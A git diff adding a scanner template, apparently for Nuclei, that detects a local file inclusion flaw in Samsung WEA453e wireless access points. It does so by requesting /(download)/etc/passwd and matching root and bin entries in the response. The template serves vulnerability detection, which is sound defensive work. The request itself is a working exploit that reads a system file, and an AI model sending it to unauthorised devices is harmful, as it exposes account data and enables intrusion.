diff --git a/vulnerabilities/other/samsung-wlan-ap-lfi.yaml b/vulnerabilities/other/samsung-wlan-ap-lfi.yaml new file mode 100644 index 0000000000..8e205a7a17 --- /dev/null +++ b/vulnerabilities/other/samsung-wlan-ap-lfi.yaml @@ -0,0 +1,23 @@ +id: samsung-wlan-ap-lfi + +info: + name: Samsung Wlan AP (WEA453e) LFI + author: pikpikcu + severity: critical + reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ + +requests: + - method: GET + path: + - "{{BaseURL}}/(download)/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[0*]:0:0" + - "bin:[x]:1:1" + part: body + - type: status + status: + - 200